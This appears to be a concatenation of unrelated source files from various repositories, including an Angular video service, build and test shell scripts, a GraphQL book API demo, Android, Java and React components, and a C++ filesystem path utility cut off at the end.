import { tap, catchError, filter, map } from 'rxjs/operators';
import { AppUser } from '../models/app-user';
import { LogService } from './log.service';
@Injectable({
  providedIn: 'root'
})
export class VideoService {

  private videosUrl = 'api/videos'; // URL to web api

  httpOptions = {
    headers: new HttpHeaders({ 'Content-Type': 'application/json' })
  };

  constructor(private httpClient: HttpClient, private logService: LogService) { }

  /** GET: all videos from the server. Emits [] (and logs) on error. */
  getVideos(): Observable<AppVideo[]> {
    return this.httpClient.get<AppVideo[]>(this.videosUrl).pipe(
      tap(_ => this.log('fetched Videos ')),
      catchError(this.handleError<AppVideo[]>('getVideos', []))
    );
  }

  // REF: https://stackblitz.com/angular/kmxkdnbbppn?file=src%2Fapp%2Fheroes%2Fhero.service.ts
  /** Emit the first video whose year matches selectedYear, or undefined. */
  getVideoByYear(selectedYear: number) {
    return this.getVideos().pipe(
      map((vs: AppVideo[]) => vs.find(v => v.year === +selectedYear)));
  }

  /** PUT: update the Video on the server */
  updateVideo(video: AppVideo): Observable<any> {
    return this.httpClient.put(this.videosUrl, video, this.httpOptions).pipe(
      tap(_ => this.log(`updated video id=${video.id}`)),
      catchError(this.handleError<any>('updateVideo'))
    );
  }

  /** GET: comments (served from the same videos endpoint). */
  getAppComment(): Observable<AppVideo[]> {
    return this.httpClient.get<AppVideo[]>(this.videosUrl).pipe(
      tap((commentList: AppVideo[]) => this.logService.log(commentList)),
      catchError(this.handleError<AppVideo[]>('getAppComment', []))
    );
  }

  /** POST: create a comment. */
  addAppComment(video: AppVideo): Observable<AppVideo> {
    return this.httpClient.post<AppVideo>(this.videosUrl, video, this.httpOptions).pipe(
      tap((newComment: AppVideo) => this.logService.log(`added Comment`)),
      catchError(this.handleError<AppVideo>('addComment'))
    );
  }

  /**
   * POST: create a like.
   * NOTE(review): posts a bare number as the request body — confirm the API
   * accepts this rather than an object payload.
   */
  addAppLike(like: number): Observable<AppVideo> {
    return this.httpClient.post<AppVideo>(this.videosUrl, like, this.httpOptions).pipe(
      tap((newLike: AppVideo) => this.logService.log(`added Like`)),
      catchError(this.handleError<AppVideo>('addLike'))
    );
  }

  /** POST: add a new video to the server */
  addVideo(appVideo: AppVideo): Observable<AppVideo> {
    return this.httpClient.post<AppVideo>(this.videosUrl, appVideo, this.httpOptions).pipe(
      tap((newVideo: AppVideo) => this.log(`added Video w/ id=${newVideo.id}`)),
      catchError(this.handleError<AppVideo>('addVideo'))
    );
  }

  /**
   * Handle Http operation that failed.
   * Let the app continue.
   * @param operation - name of the operation that failed
   * @param result - optional value to return as the observable result
   */
  private handleError<T>(operation = 'operation', result?: T) {
    return (error: any): Observable<T> => {
      console.error(error); // log to console instead
      this.log(`${operation} failed: ${error.message}`);
      return of(result as T);
    };
  }

  /** Log a VideoService message (console only until MessageService is wired up). */
  private log(message: string) {
    // this.messageService.add(`UserService: ${message}`);
    // Fixed copy-paste bug: prefix said "UserService" although this is the VideoService.
    console.warn(`VideoService: ${message}`);
  }

  /**
   * PUT: update the video item on the server.
   * NOTE(review): duplicates updateVideo — consider delegating to it.
   */
  updateTopic(video: AppVideoItem): Observable<any> {
    return this.httpClient.put(this.videosUrl, video, this.httpOptions).pipe(
      tap(_ => this.log(`updated video id=${video.id}`)),
      catchError(this.handleError<any>('updateVideo'))
    );
  }
}
|
# Use the caller-provided PYTHON interpreter, falling back to `which python`.
PYTHON="${PYTHON:-$(which python)}"
# Install the package via its setup script.
$PYTHON setup.py install
|
#!/bin/bash
# Abort on the first failing command.
set -e
# No unit tests exist yet: report that, run the linter, and exit successfully.
echo "Error: no test specified"
yarn lint
exit 0
|
class LastNElements:
    """Fixed-capacity buffer that keeps only the last ``n`` pushed elements."""

    def __init__(self, n):
        # Maximum number of retained elements; values < 1 mean nothing is kept.
        self.n = n
        self.elements = []

    def push(self, element):
        """Add ``element``, evicting the oldest entry once capacity is reached."""
        if self.n <= 0:
            # Bug fix: with n == 0 the original shifted into an empty list and
            # raised IndexError on `self.elements[-1] = element`.
            return
        if len(self.elements) < self.n:
            self.elements.append(element)
        else:
            # Drop the oldest element instead of shifting every slot manually.
            self.elements.pop(0)
            self.elements.append(element)

    def get_elements(self):
        """Return the retained elements, oldest first."""
        return self.elements
/**
* Created by <EMAIL> on 2019/3/20.
*/
import "./style.less";
import React,{PureComponent} from 'react';
import {fromLu} from "youchain-utils";
import popup from "../../../../popup";
import Utils from "../../../../common/utils";
import {Button} from "../../../../components/vendors";
import Tab from "../../../../components/common/tab";
export default class Result extends PureComponent{
constructor(props){
super(props);
this.state = {
idx:0
};
this.onChangeTab = this.onChangeTab.bind(this);
}
onChangeTab(idx){
this.setState({
idx
});
}
render(){
const {locale,data:{gasPrice,gasLimit,data,value},onShowMsg,onSubmit,onShowGas} = this.props;
const {app:{usd},account} = this.props.state;
const currentAccount = account.list[account.current];
const {idx} = this.state;
const tabs = [
{
title:locale.deploy_detail
},
{
title:locale.deploy_data
}
];
const balance = Utils.formatAccuracy(currentAccount.balance || 0);
console.log("gasPrice: ", gasPrice);
console.log("gasLimit: ", gasLimit);
const gas = fromLu((gasPrice * gasLimit).toString(),"you");
const used = gas + (value ? value : 0);
return (
<div className="content-common-wrapper deploy-result-wrapper">
<Tab
data={tabs}
onChange={this.onChangeTab}
defaultIdx={idx}
/>
{
idx === 0 ?
<section className="detail-region">
<div>
<section>{locale.from}</section>
<section>
<h4 className="overflow">
{currentAccount.name}
<small>({balance.toFixed(4)} YOU)</small>
</h4>
<small className="address">{Utils.formatAddress(currentAccount.address,false)}</small>
</section>
</div>
{
value && Math.abs(value) > 0 ?
<div>
<section>{locale.count}</section>
<section>
<h4>{value} YOU</h4>
<small>{Utils.formatUsd(usd,value,7)} USD</small>
</section>
</div> : null
}
<div>
<section>{locale.gas}</section>
<section>
<h4>{gas} YOU</h4>
<small>{Utils.formatUsd(usd,gas,7)} USD</small>
</section>
</div>
<div>
<a onClick={()=>{
onShowGas && onShowGas();
}}>{locale.advanced_options}</a>
</div>
</section> : null
}
{
idx === 1 ?
<section className="data-region">
<p>{locale.deploy_data_title}</p>
<div>
{
data
}
</div>
</section> : null
}
<section className="actions-region">
<Button
text={locale.cancel}
type={"default"}
block={true}
onClick={()=>{
popup.messageToContent({
method:"close"
});
}}
/>
<Button
text={locale.confirm}
block={true}
onClick={()=>{
if(balance - used < 0){
onShowMsg && onShowMsg(locale.insufficient_funds,"info");
}
else{
onSubmit && onSubmit();
}
}}
/>
</section>
</div>
)
}
} |
<reponame>JustinDFuller/purchase-saving-planner
import * as Auth from "auth";
import * as Notifications from "notifications";
import * as Purchase from "purchase";
import * as Layout from "layout";
import * as data from "../data";
export const List = Auth.context.With(function ({ auth }) {
const { user } = data.Use();
return (
<div className="row m-auto pt-4">
<div className="col col-12">
{auth.isLoggedIn() && !user.purchases().hasAtLeastOne() ? (
<Layout.components.HowItWorks />
) : (
<Purchase.components.List loading={auth.isLoggingIn()} />
)}
</div>
<Notifications.components.Toasts />
</div>
);
});
List.path = "/app/user/list";
|
const express = require('express');
const graphqlHTTP = require('express-graphql');
const { buildSchema } = require('graphql');

// Static in-memory book catalogue that the resolvers below query.
const book_list = [
  { title: 'Alice in Wonderland', author: 'Lewis Carroll' },
  { title: 'The Hobbit', author: 'J.R.R. Tolkien' },
  { title: 'Pride and Prejudice', author: 'Jane Austen' },
];

// Construct a schema, using GraphQL schema language
const schema = buildSchema(`
  type Book {
    title: String
    author: String
  }
  type Query {
    allBooks: [Book]
    findByTitle(title: String): [Book]
    findByAuthor(author: String): [Book]
  }
`);

// Top-level resolvers backing the Query type.
function allBooks() {
  return book_list;
}

function findByTitle({ title }) {
  return book_list.filter((book) => book.title === title);
}

function findByAuthor({ author }) {
  return book_list.filter((book) => book.author === author);
}

const app = express();

// Setup the GraphQL endpoint
app.use(
  '/graphql',
  graphqlHTTP({
    schema,
    rootValue: { allBooks, findByTitle, findByAuthor },
    graphiql: true,
  })
);

const PORT = 4000;
app.listen(PORT, () => {
  console.log(`GraphQL API listening on port ${PORT}!`);
});
import makeGamesRepository from 'shared/domain/repositories/factories/makeGamesRepository';
import GetGameDetailsService from '../GetGameDetailsService';

/** Build a GetGameDetailsService wired with the default games repository. */
export default function makeGetGameDetailsService(): GetGameDetailsService {
  return new GetGameDetailsService(makeGamesRepository());
}
|
def stringSearch(text, string):
    """Return the lowest index in ``text`` where ``string`` occurs, or -1.

    Fixes two defects in the original hand-rolled scan:
    - off-by-one: ``range(textLen - stringLen)`` never tested the final
      alignment, so a match at the very end of ``text`` was missed;
    - "not found" returned 0, indistinguishable from a match at index 0.
      Following the stdlib convention, absence now yields -1.
    """
    # str.find implements exactly the intended semantics (lowest index, -1
    # when absent), so prefer it over the manual double loop.
    return text.find(string)
#!/bin/bash
# Remove the tno container and image for the tag passed as $1.
if [[ "$1" ]]; then
  echo "Removing container tno-$1"
  # Quote the expansions so a tag with spaces/globs cannot split the argument.
  docker rm -f "tno-$1"
  docker image rm -f "tno:$1"
fi
<gh_stars>1-10
package com.linwei.annotation;
import androidx.appcompat.app.AppCompatActivity;
import android.os.Bundle;
import android.view.View;
import android.widget.TextView;
import android.widget.Toast;
import com.linwei.annotation.utils.AnnotationUtils;
/** Demo activity whose view binding and click wiring come from AnnotationUtils. */
public class ThreeActivity extends AppCompatActivity {

    // Injected by AnnotationUtils.bind() via the @BindView annotation.
    @BindView(R.id.mTvTitle)
    public TextView mTvTitle;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_three);
        AnnotationUtils.bind(this);
    }

    @OnClick({R.id.mBtSubmit})
    public void onClick(View view) {
        // Guard clause: only react to the submit button.
        if (view.getId() != R.id.mBtSubmit) {
            return;
        }
        Toast.makeText(this, "点击了", Toast.LENGTH_SHORT).show();
    }
}
|
#!/usr/bin/env bash
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
set -e
# Absolute directory of this script, independent of the caller's cwd.
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null && pwd )"
RESULT_DIR=result
#delete previous results
rm -rf "${DIR:?}/$RESULT_DIR"
mkdir -p "$DIR/$RESULT_DIR"
#Should be writeable from the docker containers where user is different.
chmod ogu+w "$DIR/$RESULT_DIR"
## @description wait until 3 datanodes are up (or 30 seconds)
## @param the docker-compose file
wait_for_datanodes(){
  #Reset the timer
  SECONDS=0
  #Don't give it up until 30 seconds
  while [[ $SECONDS -lt 30 ]]; do
    #This line checks the number of HEALTHY datanodes registered in scm over the
    # jmx HTTP servlet
    datanodes=$(docker-compose -f "$1" exec -T scm curl -s 'http://localhost:9876/jmx?qry=Hadoop:service=SCMNodeManager,name=SCMNodeManagerInfo' | jq -r '.beans[0].NodeCount[] | select(.key=="HEALTHY") | .value')
    if [[ "$datanodes" == "3" ]]; then
      #It's up and running. Let's return from the function.
      echo "$datanodes datanodes are up and registered to the scm"
      return
    else
      #Print it only if a number. Could be not a number if scm is not yet started
      if [[ "$datanodes" ]]; then
        #Fixed typo in the progress message ("healhty" -> "healthy")
        echo "$datanodes datanode is up and healthy (until now)"
      fi
    fi
    sleep 2
  done
  echo "WARNING! Datanodes are not started successfully. Please check the docker-compose files"
}
## @description Execute selected test suites in a specified docker-compose environment
## @param the name of the docker-compose env relative to ../compose
## @param the name of the tests (array of subdir names of the dir of this script)
execute_tests(){
  COMPOSE_DIR=$1
  COMPOSE_FILE=$DIR/../compose/$COMPOSE_DIR/docker-compose.yaml
  # NOTE(review): $2 only captures the first array element; every current
  # caller passes a one-element array, so this works — confirm if that changes.
  TESTS=$2
  echo "-------------------------------------------------"
  echo "Executing test(s): [${TESTS[*]}]"
  echo ""
  echo "  Cluster type:      $COMPOSE_DIR"
  echo "  Compose file:      $COMPOSE_FILE"
  echo "  Output dir:        $DIR/$RESULT_DIR"
  echo "  Command to rerun:  ./test.sh --keep --env $COMPOSE_DIR $TESTS"
  echo "-------------------------------------------------"
  # Start a fresh cluster with three datanodes and wait until they register.
  docker-compose -f "$COMPOSE_FILE" down
  docker-compose -f "$COMPOSE_FILE" up -d --scale datanode=3
  wait_for_datanodes "$COMPOSE_FILE"
  #TODO: we need to wait for the OM here
  sleep 10
  # Run each robot suite inside the ozoneManager container; keep going on
  # failures (set +e) so logs are still collected per suite.
  for TEST in "${TESTS[@]}"; do
    TITLE="Ozone $TEST tests with $COMPOSE_DIR cluster"
    set +e
    OUTPUT_NAME="$COMPOSE_DIR-${TEST//\//_}"
    docker-compose -f "$COMPOSE_FILE" exec -T ozoneManager python -m robot --log NONE --report NONE "${OZONE_ROBOT_OPTS[@]}" --output "smoketest/$RESULT_DIR/robot-$OUTPUT_NAME.xml" --logtitle "$TITLE" --reporttitle "$TITLE" "smoketest/$TEST"
    set -e
    docker-compose -f "$COMPOSE_FILE" logs > "$DIR/$RESULT_DIR/docker-$OUTPUT_NAME.log"
  done
  if [ "$KEEP_RUNNING" = false ]; then
    docker-compose -f "$COMPOSE_FILE" down
  fi
}
# Defaults: run every suite on every cluster type; stop clusters afterwards.
RUN_ALL=true
KEEP_RUNNING=false
POSITIONAL=()
# Parse --env/--keep/--help; everything else is collected as test-suite names.
while [[ $# -gt 0 ]]
do
key="$1"
case $key in
  --env)
    DOCKERENV="$2"
    RUN_ALL=false
    shift # past argument
    shift # past value
    ;;
  --keep)
    KEEP_RUNNING=true
    shift # past argument
    ;;
  --help|-h|-help)
    cat << EOF
Acceptance test executor for ozone.
This is a lightweight test executor for ozone.
You can run it with
./test.sh
Which executes all the tests in all the available environments.
Or you can run manually one test with
./test.sh --keep --env ozone-hdfs basic
--keep means that docker cluster won't be stopped after the test (optional)
--env defines the subdirectory under the compose dir
The remaining parameters define the test suites under smoketest dir.
Could be any directory or robot file relative to the smoketest dir.
EOF
    exit 0
    ;;
  *)
    POSITIONAL+=("$1") # save it in an array for later
    shift # past argument
    ;;
esac
done
if [ "$RUN_ALL" = true ]; then
#
# This is the definition of the ozone acceptance test suite
#
# We select the test suites and execute them on multiple type of clusters
#
   TESTS=("basic")
   execute_tests ozone "${TESTS[@]}"
   TESTS=("auditparser")
   execute_tests ozone "${TESTS[@]}"
   TESTS=("ozonefs")
   execute_tests ozonefs "${TESTS[@]}"
   TESTS=("basic")
   execute_tests ozone-hdfs "${TESTS[@]}"
   TESTS=("s3")
   execute_tests ozones3 "${TESTS[@]}"
else
   # Run only the suites named on the command line against the chosen env.
   execute_tests "$DOCKERENV" "${POSITIONAL[@]}"
fi
#Generate the combined output and return with the right exit code (note: robot = execute test, rebot = generate output)
docker run --rm -v "$DIR/..:/opt/hadoop" apache/hadoop-runner rebot -d "smoketest/$RESULT_DIR" "smoketest/$RESULT_DIR/robot-*.xml"
|
<reponame>giorgiofederici/giorgiofederici-frontend
import { Action } from '@ngrx/store';
/** Action type identifiers for the logout flow. */
export enum LogoutActionTypes {
  Logout = '[Logout] Logout',
  LogoutConfirmation = '[Logout] Logout Confirmation',
  LogoutConfirmationDismiss = '[Logout] Logout Confirmation Dismiss'
}

/** Dispatched to start the logout flow. */
export class Logout implements Action {
  readonly type = LogoutActionTypes.Logout;
}

/** Dispatched when the logout is confirmed. */
export class LogoutConfirmation implements Action {
  readonly type = LogoutActionTypes.LogoutConfirmation;
}

/** Dispatched when the logout confirmation is dismissed. */
export class LogoutConfirmationDismiss implements Action {
  readonly type = LogoutActionTypes.LogoutConfirmationDismiss;
}

/** Union of all logout actions, for reducers/effects. */
export type LogoutActionsUnion =
  | Logout
  | LogoutConfirmation
  | LogoutConfirmationDismiss;
|
import json


def serialize_dict(input_dict):
    """Serialize a dictionary into its JSON string representation."""
    as_json = json.dumps(input_dict)
    return as_json
# Extract the YouTube watch history from two Google Takeout archives into the
# same mp3 output directory.
python google_takeout.py --youtube_archive_dir /media/philippe/DATA/google-takeout/Takeout\ 2 --output_dir /media/philippe/DATA/google-takeout/mp3-takout --download_watch_history
python google_takeout.py --youtube_archive_dir /media/philippe/DATA/google-takeout/Takeout --output_dir /media/philippe/DATA/google-takeout/mp3-takout --download_watch_history
# Keep only tracks between 0 and 8 minutes; dry run, log captured in out.txt.
python filter_lengthy_songs.py --input_dir /media/philippe/DATA/google-takeout/mp3-takout --output_dir /media/philippe/DATA/google-takeout/mp3-takout-2 --force --min_minutes 0 --max_minutes 8 --dry_run > out.txt
|
import datetime

# Accumulates every highlight row that has been posted, in insertion order.
highlightsPosted = []


def add_highlight(row):
    """Append the current timestamp to ``row``, record it, and return it."""
    timestamp = str(datetime.datetime.now())
    stamped_row = row + [timestamp]
    highlightsPosted.append(stamped_row)
    return stamped_row
<filename>ods-base-support/ods-system/src/main/java/cn/stylefeng/guns/sys/modular/log/param/SysOpLogParam.java
/*
Copyright [2020] [https://www.stylefeng.cn]
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Guns采用APACHE LICENSE 2.0开源协议,您在使用过程中,需要注意以下几点:
1.请不要删除和修改根目录下的LICENSE文件。
2.请不要删除和修改Guns源码头部的版权声明。
3.请保留源码和相关描述文件的项目出处,作者声明等。
4.分发源码时候,请注明软件出处 https://gitee.com/stylefeng/guns-separation
5.在修改包名,模块名称,项目代码等时,请注明软件出处 https://gitee.com/stylefeng/guns-separation
6.若您的项目无法满足以上几点,可申请商业授权,获取Guns商业授权许可,请在官网购买授权,地址为 https://www.stylefeng.cn
*/
package cn.stylefeng.guns.sys.modular.log.param;
import cn.stylefeng.guns.core.pojo.base.param.BaseParam;
import java.util.Date;
import java.util.Objects;
/**
 * Operation log query/request parameter.
 *
 * @author xuyuxiang
 * @date 2020/3/26 9:16
 */
public class SysOpLogParam extends BaseParam {

    /**
     * Primary key
     */
    private Long id;

    /**
     * Name
     */
    private String name;

    /**
     * Operation type (0 other, 1 add, 2 delete, 3 edit ... see BaseParam's validation types)
     */
    private Integer opType;

    /**
     * Whether execution succeeded (Y - yes, N - no)
     */
    private String success;

    /**
     * Detail message
     */
    private String message;

    /**
     * ip
     */
    private String ip;

    /**
     * Location
     */
    private String location;

    /**
     * Browser
     */
    private String browser;

    /**
     * Operating system
     */
    private String os;

    /**
     * Request URL
     */
    private String url;

    /**
     * Class name
     */
    private String className;

    /**
     * Method name
     */
    private String methodName;

    /**
     * Request method (GET POST PUT DELETE)
     */
    private String reqMethod;

    /**
     * Request parameters
     */
    private String param;

    /**
     * Response result
     */
    private String result;

    /**
     * Operation time
     */
    private Date opTime;

    /**
     * Operator account
     */
    private String account;

    public Long getId() {
        return id;
    }

    public void setId(Long id) {
        this.id = id;
    }

    public String getName() {
        return name;
    }

    public void setName(String name) {
        this.name = name;
    }

    public Integer getOpType() {
        return opType;
    }

    public void setOpType(Integer opType) {
        this.opType = opType;
    }

    public String getSuccess() {
        return success;
    }

    public void setSuccess(String success) {
        this.success = success;
    }

    public String getMessage() {
        return message;
    }

    public void setMessage(String message) {
        this.message = message;
    }

    public String getIp() {
        return ip;
    }

    public void setIp(String ip) {
        this.ip = ip;
    }

    public String getLocation() {
        return location;
    }

    public void setLocation(String location) {
        this.location = location;
    }

    public String getBrowser() {
        return browser;
    }

    public void setBrowser(String browser) {
        this.browser = browser;
    }

    public String getOs() {
        return os;
    }

    public void setOs(String os) {
        this.os = os;
    }

    public String getUrl() {
        return url;
    }

    public void setUrl(String url) {
        this.url = url;
    }

    public String getClassName() {
        return className;
    }

    public void setClassName(String className) {
        this.className = className;
    }

    public String getMethodName() {
        return methodName;
    }

    public void setMethodName(String methodName) {
        this.methodName = methodName;
    }

    public String getReqMethod() {
        return reqMethod;
    }

    public void setReqMethod(String reqMethod) {
        this.reqMethod = reqMethod;
    }

    public String getParam() {
        return param;
    }

    public void setParam(String param) {
        this.param = param;
    }

    public String getResult() {
        return result;
    }

    public void setResult(String result) {
        this.result = result;
    }

    public Date getOpTime() {
        return opTime;
    }

    public void setOpTime(Date opTime) {
        this.opTime = opTime;
    }

    public String getAccount() {
        return account;
    }

    public void setAccount(String account) {
        this.account = account;
    }

    // Equality includes the BaseParam state (super.equals) plus every field.
    @Override
    public boolean equals(Object o) {
        if (this == o) return true;
        if (o == null || getClass() != o.getClass()) return false;
        if (!super.equals(o)) return false;
        SysOpLogParam that = (SysOpLogParam) o;
        return Objects.equals(id, that.id) &&
                Objects.equals(name, that.name) &&
                Objects.equals(opType, that.opType) &&
                Objects.equals(success, that.success) &&
                Objects.equals(message, that.message) &&
                Objects.equals(ip, that.ip) &&
                Objects.equals(location, that.location) &&
                Objects.equals(browser, that.browser) &&
                Objects.equals(os, that.os) &&
                Objects.equals(url, that.url) &&
                Objects.equals(className, that.className) &&
                Objects.equals(methodName, that.methodName) &&
                Objects.equals(reqMethod, that.reqMethod) &&
                Objects.equals(param, that.param) &&
                Objects.equals(result, that.result) &&
                Objects.equals(opTime, that.opTime) &&
                Objects.equals(account, that.account);
    }

    @Override
    public int hashCode() {
        return Objects.hash(super.hashCode(), id, name, opType, success, message, ip, location, browser, os, url, className, methodName, reqMethod, param, result, opTime, account);
    }
}
|
# Install xcpretty (formats xcodebuild output); skip docs for speed.
gem install xcpretty --no-ri --no-rdoc
# Install scan-build (Clang static analyzer driver) into the user site dir.
export PYTHONUSERBASE=~/.local
easy_install --user scan-build
export PATH="${HOME}/.local/bin:${PATH}"
# Run the Xcode static analyzer over the workspace; --status-bugs makes the
# command (and with pipefail, the whole pipeline) fail when bugs are found.
set -o pipefail && scan-build --status-bugs --use-analyzer Xcode xcodebuild analyze -workspace Stripe.xcworkspace -scheme "StripeiOS" -configuration Debug -sdk iphonesimulator ONLY_ACTIVE_ARCH=NO | xcpretty
|
#!/bin/bash
# This script relies upon the following environment variables:
# OS_AUTH_URL = Specifies the URL for authentication
# OS_USERNAME = Specifies the username for authentication
# OS_PASSWORD = Specifies the password for authentication
# OS_TENANT_NAME = Specifies the name of the tenant Docker Machine will use
# Define the Swarm token (must be re-generated every time this is re-run)
SWARM_TOKEN="593313abdb6a669f7e84892b8c4d7a84"
# Define some values used later
OS_IMAGE_ID="eed0ae16-948a-4930-97ab-f7ba128385a8"
OS_NETWORK_NAME="demo-net"
OS_SSH_USER="ubuntu"
OS_FLOATINGIP_POOL="ext-net-5"
# Create the node-02 instance as a Swarm member on OpenStack, attaching a
# floating IP and the docker/basic-services security groups.
docker-machine create -d openstack \
  --openstack-flavor-id 3 \
  --openstack-image-id $OS_IMAGE_ID \
  --openstack-net-name $OS_NETWORK_NAME \
  --openstack-floatingip-pool $OS_FLOATINGIP_POOL \
  --openstack-ssh-user $OS_SSH_USER \
  --openstack-sec-groups docker,basic-services \
  --swarm \
  --swarm-discovery token://$SWARM_TOKEN \
  node-02
package com.abner.playground.nio;
import java.io.IOException;
import java.io.RandomAccessFile;
import java.nio.ByteBuffer;
import java.nio.channels.FileChannel;
/**
 * Demo: read a file through a FileChannel and print it character by character.
 */
public class FileChannelTest {

    public static void main(String[] args) throws IOException {
        // try-with-resources closes both the file and its channel on exit
        // (the original leaked them on every code path).
        try (RandomAccessFile accessFile = new RandomAccessFile("c:/tmp/123.txt", "rw");
             FileChannel fileChannel = accessFile.getChannel()) {
            ByteBuffer buffer = ByteBuffer.allocate(2048); // 2048-byte buffer
            int byteLength = fileChannel.read(buffer);
            System.out.println("byte length : " + byteLength);
            while (byteLength != -1) {
                buffer.flip(); // switch to read mode
                while (buffer.hasRemaining()) {
                    System.out.println((char) buffer.get());
                }
                buffer.compact(); // keep unread bytes, make room for the next read
                byteLength = fileChannel.read(buffer);
            }
        }
    }
}
|
#!/bin/bash
# Run one simulation with geometry parameter 10.0, numbered 88.
python RunSimulation.py --Geo 10.0 --sim_num 88
<gh_stars>1-10
"use strict";

// Compiled (CommonJS) icon definition for a "trash" glyph; the SVG path data
// is a single pre-built string. Looks auto-generated — prefer editing the
// icon source rather than this file.
Object.defineProperty(exports, "__esModule", {
  value: true
});
exports.trash = void 0;
var trash = {
  "viewBox": "0 0 1408 1792",
  "children": [{
    "name": "path",
    "attribs": {
      "d": "M512 1376v-704q0-14-9-23t-23-9h-64q-14 0-23 9t-9 23v704q0 14 9 23t23 9h64q14 0 23-9t9-23zM768 1376v-704q0-14-9-23t-23-9h-64q-14 0-23 9t-9 23v704q0 14 9 23t23 9h64q14 0 23-9t9-23zM1024 1376v-704q0-14-9-23t-23-9h-64q-14 0-23 9t-9 23v704q0 14 9 23t23 9h64q14 0 23-9t9-23zM480 384h448l-48-117q-7-9-17-11h-317q-10 2-17 11zM1408 416v64q0 14-9 23t-23 9h-96v948q0 83-47 143.5t-113 60.5h-832q-66 0-113-58.5t-47-141.5v-952h-96q-14 0-23-9t-9-23v-64q0-14 9-23t23-9h309l70-167q15-37 54-63t79-26h320q40 0 79 26t54 63l70 167h309q14 0 23 9t9 23z"
    }
  }]
};
exports.trash = trash;
#include "glass/utils/path.h"
#ifdef USE_QT
#include <QString>
#include <QFileInfo>
#endif
using namespace std;
// Normalise a path in place: empty -> ".", backslashes -> forward slashes,
// and runs of consecutive slashes collapsed into one.
void path::format(string& filename)
{
    if(filename.empty())
    {
        filename = ".";
    }
    string cleaned;
    cleaned.reserve(filename.size());
    for(char c : filename)
    {
        if(c == '\\')
        {
            c = '/';
        }
        // Skip a slash that directly follows another slash.
        if(c == '/' && !cleaned.empty() && cleaned.back() == '/')
        {
            continue;
        }
        cleaned += c;
    }
    filename = cleaned;
}
// List the entries of folder_name (non-recursive), skipping every entry whose
// name starts with '.'. Returns an empty vector when folder_name is not a
// directory. Entries are prefixed with folder_name unless it is ".".
vector<string> path::ls(string folder_name)
{
    path::format(folder_name);
    if(folder_name[folder_name.size()-1] == '/')
    {
        folder_name.erase(folder_name.size()-1, 1);
    }
    vector<string> filenames;
    struct stat s;
    stat(folder_name.c_str(), &s);
    if(!S_ISDIR(s.st_mode))
    {
        return filenames;
    }
    DIR* open_dir = opendir(folder_name.c_str());
    if(NULL == open_dir)
    {
        // NOTE(review): terminating the whole process on a failed opendir is
        // drastic for a library helper — consider returning the empty list.
        exit(EXIT_FAILURE);
    }
    dirent* p = nullptr;
    while( (p = readdir(open_dir)) != nullptr)
    {
        // Skips hidden entries as well as "." and "..".
        if(p->d_name[0] != '.')
        {
            if(folder_name != ".")
                filenames.push_back(folder_name + "/" + string(p->d_name));
            else
                filenames.push_back(string(p->d_name));
        }
    }
    closedir(open_dir);
    return filenames;
}
// Change the process working directory; returns chdir's result (0 on success).
int path::cd(string dir_name)
{
    path::format(dir_name);
    return chdir(dir_name.c_str());
}
// Return the current working directory, normalised. Same behaviour as pwd().
string path::cd()
{
    char buffer[1024];
    getcwd(buffer, 1024);
    string current_dir(buffer);
    format(current_dir);
    return current_dir;
}
// Return the current working directory, normalised.
string path::pwd()
{
    char buffer[1024];
    getcwd(buffer, 1024);
    string current_dir(buffer);
    format(current_dir);
    return current_dir;
}
// True when filename names an existing regular file.
bool path::isfile(string filename)
{
    path::format(filename);
    // A trailing slash can only denote a directory. format() guarantees the
    // string is non-empty, so back() is safe.
    if(filename.back() == '/')
    {
        return false;
    }
    struct stat s;
    if(stat(filename.c_str(), &s) != 0)
    {
        return false;
    }
    return (s.st_mode & S_IFREG) != 0;
}
// True when folder_name names an existing directory.
bool path::isdir(string folder_name)
{
    path::format(folder_name);
    struct stat s;
    if(stat(folder_name.c_str(), &s) != 0)
    {
        return false;
    }
    return (s.st_mode & S_IFDIR) != 0;
}
// True when name exists at all (file, directory, or anything stat-able).
bool path::exists(string name)
{
    path::format(name);
    struct stat s;
    return stat(name.c_str(), &s) == 0;
}
// Create folder_name and any missing parent directories (like `mkdir -p`).
// Returns 0 on success, 1 if the directory already existed, -1 on failure.
int path::mkdir(string folder_name)
{
    path::format(folder_name);
    if(folder_name[folder_name.size()-1] == '/')
    {
        folder_name.erase(folder_name.size()-1, 1);
    }
    // Walk the path from the deepest component upwards, pushing every missing
    // ancestor until an existing directory is reached.
    stack<string> S;
    int n = folder_name.size();
    int i = n;
    while(true)
    {
        if(i == n || folder_name[i] == '/' || folder_name[i] == '\\')
        {
            string current_name = folder_name.substr(0, i);
            if(isdir(current_name))
            {
                break;
            }
            else
            {
                S.push(current_name);
            }
        }
        i--;
        if(i == 0)
        {
            break;
        }
    }
    if(S.empty())
    {
        // Nothing to create: the directory already exists.
        return 1;
    }
    // Create missing directories from the shallowest to the deepest.
    while(!S.empty())
    {
        int flag;
#ifdef __linux__
        flag = ::mkdir(S.top().c_str(), 0755);
#else
        flag = ::mkdir(S.top().c_str());
#endif
        if(flag != 0)
        {
            return -1;
        }
        S.pop();
    }
    return 0;
}
// Delete a file, or recursively delete a directory and its contents.
// Returns the result of the final remove/rmdir call.
int path::rm(string name)
{
    path::format(name);
    if(isfile(name))
    {
        return remove(name.c_str());
    }
    vector<string> files = ls(name);
    if(files.empty())
    {
        return rmdir(name.c_str());
    }
    // Remove the children first, then the (now empty) directory itself.
    for(auto it = files.begin(); it != files.end(); it++)
    {
        rm(it->c_str());
    }
    return rmdir(name.c_str());
}
// Return the absolute form of filename, normalised with format().
// NOTE(review): MAX_PATH is assumed to be provided by a header on every
